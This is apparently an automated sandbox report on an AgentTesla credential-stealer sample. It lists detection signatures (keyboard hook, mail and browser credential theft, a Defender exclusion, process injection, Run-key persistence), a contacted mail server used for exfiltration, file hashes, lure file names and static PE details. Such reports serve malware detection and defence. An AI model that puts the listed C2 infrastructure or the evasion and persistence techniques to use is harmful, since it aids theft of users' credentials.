                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                    Hidden Files and Directories                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519249 Sample: Eschemyquote24573j33.exe Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 39 mail.musabody.com 2->39 51 Suricata IDS alerts for network traffic 2->51 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 8 other signatures 2->57 8 Eschemyquote24573j33.exe 4 2->8         started        12 ctsdvwT.exe 3 2->12         started        14 ctsdvwT.exe 2 2->14         started        signatures3 process4 file5 35 C:\Users\...schemyquote24573j33.exe.log, ASCII 8->35 dropped 59 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->59 61 Contains functionality to register a low level keyboard hook 8->61 63 Adds a directory exclusion to Windows Defender 8->63 16 Eschemyquote24573j33.exe 1 5 8->16         started        21 powershell.exe 23 8->21         started        65 Multi AV Scanner detection for dropped file 12->65 67 Machine Learning detection for dropped file 12->67 69 Injects a PE file into a foreign processes 12->69 23 ctsdvwT.exe 2 12->23         started        25 ctsdvwT.exe 14->25         started        signatures6 process7 dnsIp8 37 mail.musabody.com 108.167.140.123, 49716, 587 UNIFIEDLAYER-AS-1US United States 16->37 31 C:\Users\user\AppData\Roaming\...\ctsdvwT.exe, PE32 16->31 dropped 33 C:\Users\user\...\ctsdvwT.exe:Zone.Identifier, ASCII 16->33 dropped 41 Tries to steal Mail credentials (via file / registry access) 16->41 43 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->43 45 Installs a global keyboard hook 16->45 47 Loading BitLocker PowerShell Module 21->47 27 WmiPrvSE.exe 21->27         started        29 conhost.exe 21->29         started        49 Tries to harvest and steal browser information (history, passwords, etc) 25->49 file9 signatures10 process11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Eschemyquote24573j33.exe58%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    Eschemyquote24573j33.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe58%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://account.dyn.com/0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://mail.musabody.com0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    mail.musabody.com
                    		108.167.140.123
                    		truetrue
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://account.dyn.com/Eschemyquote24573j33.exe, 00000000.00000002.2069428436.0000000003909000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000008.00000002.2255456964.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.2283120210.0000000004071000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.2283120210.0000000003F0D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameEschemyquote24573j33.exe, 00000000.00000002.2068800637.0000000002966000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000007.00000002.2195768710.0000000002CFF000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.2276352451.0000000002EA9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://mail.musabody.comEschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003389000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      108.167.140.123
                      		mail.musabody.comUnited States
                      		46606UNIFIEDLAYER-AS-1UStrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1519249
                      Start date and time:2024-09-26 09:06:07 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 10m 3s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:13
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Eschemyquote24573j33.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@13/9@1/1
                      EGA Information:
                      • Successful, ratio: 83.3%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 226
                      • Number of non-executed functions: 8
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target ctsdvwT.exe, PID 7056 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • VT rate limit hit for: Eschemyquote24573j33.exe

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      03:06:57API Interceptor8778927x Sleep call for process: Eschemyquote24573j33.exe modified
                      03:06:59API Interceptor11x Sleep call for process: powershell.exe modified
                      03:07:10API Interceptor7424130x Sleep call for process: ctsdvwT.exe modified
                      09:07:01AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ctsdvwT C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                      09:07:09AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ctsdvwT C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      108.167.140.123PO-2024)bekotas.pdf.exeGet hashmaliciousAgentTeslaBrowse
                        Price 10243975 Bekotas A.S scan.pdf.exeGet hashmaliciousAgentTeslaBrowse
                          DUYAR MOTOR POMPA 2024 F#U0130YAT L#U0130STES#U0130 KATALOG.exeGet hashmaliciousAgentTeslaBrowse
                            rRFQ_251477800TM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              Fiyat Teklifi_Yilmaziselbiseleri scan-10523 2024935164- BUET 07.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                rPO50018137-14_pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                  62402781, Fiyat Teklif Talebi.pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                    2024-19-2118fernas.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                      DHL Shipping DocumentTracking No Confirmation.doc.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        Fiyat_teklifi_Istegi_23070_PER_120_Adet_#U2026scanneed_00101.pdf.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          mail.musabody.comPO-2024)bekotas.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          • 108.167.140.123
                                          Price 10243975 Bekotas A.S scan.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          • 108.167.140.123
                                          DUYAR MOTOR POMPA 2024 F#U0130YAT L#U0130STES#U0130 KATALOG.exeGet hashmaliciousAgentTeslaBrowse
                                          • 108.167.140.123
                                          rRFQ_251477800TM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 108.167.140.123
                                          Fiyat Teklifi_Yilmaziselbiseleri scan-10523 2024935164- BUET 07.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 108.167.140.123
                                          rPO50018137-14_pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                          • 108.167.140.123
                                          62402781, Fiyat Teklif Talebi.pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                          • 108.167.140.123
                                          2024-19-2118fernas.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          • 108.167.140.123
                                          DHL Shipping DocumentTracking No Confirmation.doc.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 108.167.140.123
                                          Fiyat_teklifi_Istegi_23070_PER_120_Adet_#U2026scanneed_00101.pdf.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 108.167.140.123

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          UNIFIEDLAYER-AS-1USshipping documents.exeGet hashmaliciousAgentTeslaBrowse
                                          • 162.214.80.31
                                          autorization Letter.exeGet hashmaliciousAgentTeslaBrowse
                                          • 192.185.129.60
                                          http://www.richfieldkennel.com/SharePointProposalFile/Get hashmaliciousHTMLPhisherBrowse
                                          • 192.185.102.120
                                          https://putefix.dogfriendlytahoe.com/Get hashmaliciousUnknownBrowse
                                          • 192.185.24.110
                                          https://albertanewsprint.dogfriendlytahoe.com/Get hashmaliciousUnknownBrowse
                                          • 192.185.24.110
                                          INDIA - VSL PARTICULARS.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          • 50.87.144.157
                                          https://dwr.yoh.mybluehost.me/wp-content/plugins/A/sdh/TU17HLK/Get hashmaliciousUnknownBrowse
                                          • 50.6.153.157
                                          https://abre.ai/k8hXGet hashmaliciousUnknownBrowse
                                          • 50.6.153.157
                                          http://nky.beb.mybluehost.me/new/auth/entrar.phpGet hashmaliciousUnknownBrowse
                                          • 50.6.153.4
                                          https://turkiyecumhuriyetiziraatbankasi.com/Get hashmaliciousUnknownBrowse
                                          • 162.240.37.219

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Eschemyquote24573j33.exe.log

                                          Download File
                                          Process:C:\Users\user\Desktop\Eschemyquote24573j33.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious:true
                                          Reputation:high, very likely benign file
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ctsdvwT.exe.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2232
                                          Entropy (8bit):5.380805901110357
                                          Encrypted:false
                                          SSDEEP:48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeC/ZM0Uyus:lGLHxvCsIfA2KRHmOugw1s
                                          MD5:2841736A1E367C6D039C41512DA2893E
                                          SHA1:8AE1356D954F14390DD115EB92E2B01F86E98141
                                          SHA-256:70D4743FAB5C407020B872595615D3B018AC17A6F504084BF1E95B061C97047E
                                          SHA-512:E11A1F186A9B75658F905B7128526E054CEE572A4F55BBB864B5E8B5DC3D8B62D1E160F31472213DB0CEB8A612D71B23DAE03EBC6AB5BC0D8933732F2007EF6C
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2cycmogx.s02.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bowt3vvo.0g5.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cwdch1x5.nt2.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dyvfnp02.mvs.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe

                                          Download File
                                          Process:C:\Users\user\Desktop\Eschemyquote24573j33.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):669696
                                          Entropy (8bit):7.817123931818624
                                          Encrypted:false
                                          SSDEEP:12288:HzX8bQbtnLi/iVh9VmQ3DC8SlQ851wNXmPygPao9xDmCjc:0IR8iVhHmQ3OtlVFPHj
                                          MD5:BDD152D62CF8FA852E08C46505629663
                                          SHA1:B1A0FD6A26C5BF9BA02C12AFCDC89EEB8528040E
                                          SHA-256:A2CDC2F4FCAD4C6B982674A1B3B86A0F7BCDB7C8F18C1183799D70777C726859
                                          SHA-512:D269318E997D36A40D5B9DFFF0A2F2A40BEB99D4103B5CC233483AF14987E3FD167829435E0F176BB1371F86E1ED9F1F3CDEEF080338448F5265EAC77CBF29D4
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 58%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....K...............0..............L... ...`....@.. ....................................@..................................L..O....`..............................h3..p............................................ ............... ..H............text....,... ...................... ..`.rsrc........`.......0..............@..@.reloc...............6..............@..B.................L......H.......tS..lE...........................................................0..d.........}.....(.......(......s7...}.....sM...}.....sM...}.....sM...}......}......}.....~....}......(.....*.0.............o....sO...}.....{.........,n...}.....{.....o......{.....o......{.....{....oI....{....o....X.{....oK....{....o....Xs....o.......(....}.....*...0..Q..........o....sO...}.....{....,..{.......+....,&..{.....{.....{....oe.....{....o......*....0.............o....sO...}.....{....,..{....

                                          C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe:Zone.Identifier

                                          Download File
                                          Process:C:\Users\user\Desktop\Eschemyquote24573j33.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Preview:[ZoneTransfer]....ZoneId=0

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.817123931818624
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:Eschemyquote24573j33.exe
                                          File size:669'696 bytes
                                          MD5:bdd152d62cf8fa852e08c46505629663
                                          SHA1:b1a0fd6a26c5bf9ba02c12afcdc89eeb8528040e
                                          SHA256:a2cdc2f4fcad4c6b982674a1b3b86a0f7bcdb7c8f18c1183799d70777c726859
                                          SHA512:d269318e997d36a40d5b9dfff0a2f2a40beb99d4103b5cc233483af14987e3fd167829435e0f176bb1371f86e1ed9f1f3cdeef080338448f5265eac77cbf29d4
                                          SSDEEP:12288:HzX8bQbtnLi/iVh9VmQ3DC8SlQ851wNXmPygPao9xDmCjc:0IR8iVhHmQ3OtlVFPHj
                                          TLSH:53E4022472AAD606D5C92BB50973D1F817B6ADD9E022D30B8FE67DEF3C3A7405842352
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....K...............0..............L... ...`....@.. ....................................@................................

                                          File Icon

                                          Icon Hash:00928e8e8686b000

                                          Static PE Info

                                          General

                                          Entrypoint:0x4a4cd6
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0xDA4BC7FC [Sun Jan 20 21:11:24 2086 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa4c810x4f.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xa60000x5b4.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
